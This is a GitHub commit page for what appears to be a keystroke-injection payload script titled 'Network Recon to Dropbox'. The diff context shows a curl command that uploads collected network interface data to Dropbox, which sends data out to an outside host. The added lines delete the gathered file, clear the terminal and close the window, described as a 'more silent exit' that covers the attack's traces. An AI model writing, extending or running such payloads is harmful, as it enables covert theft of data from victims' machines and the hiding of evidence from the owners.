Skip to content

Commit 93e5120

Browse files
authored
Made a more silent exit for Network Recon to Dropbox .txt
1 parent 7761dcc commit 93e5120

1 file changed

Lines changed: 9 additions & 0 deletions

File tree

RECON/Network Recon to Dropbox .txt

Lines changed: 9 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -26,5 +26,14 @@ STRING curl -X POST https://content.dropboxapi.com/2/files/upload -H "Authorizat
2626
DELAY 2000
2727
ENTER
2828
DELAY 5000
29+
STRING rm -r ~/Desktop/network_interfaces.txt
30+
DELAY 500
31+
ENTER
32+
STRING clear
33+
DELAY 500
34+
ENTER
2935
GUI w
36+
DELAY 500
37+
ENTER
38+
3039

0 commit comments

Comments
 (0)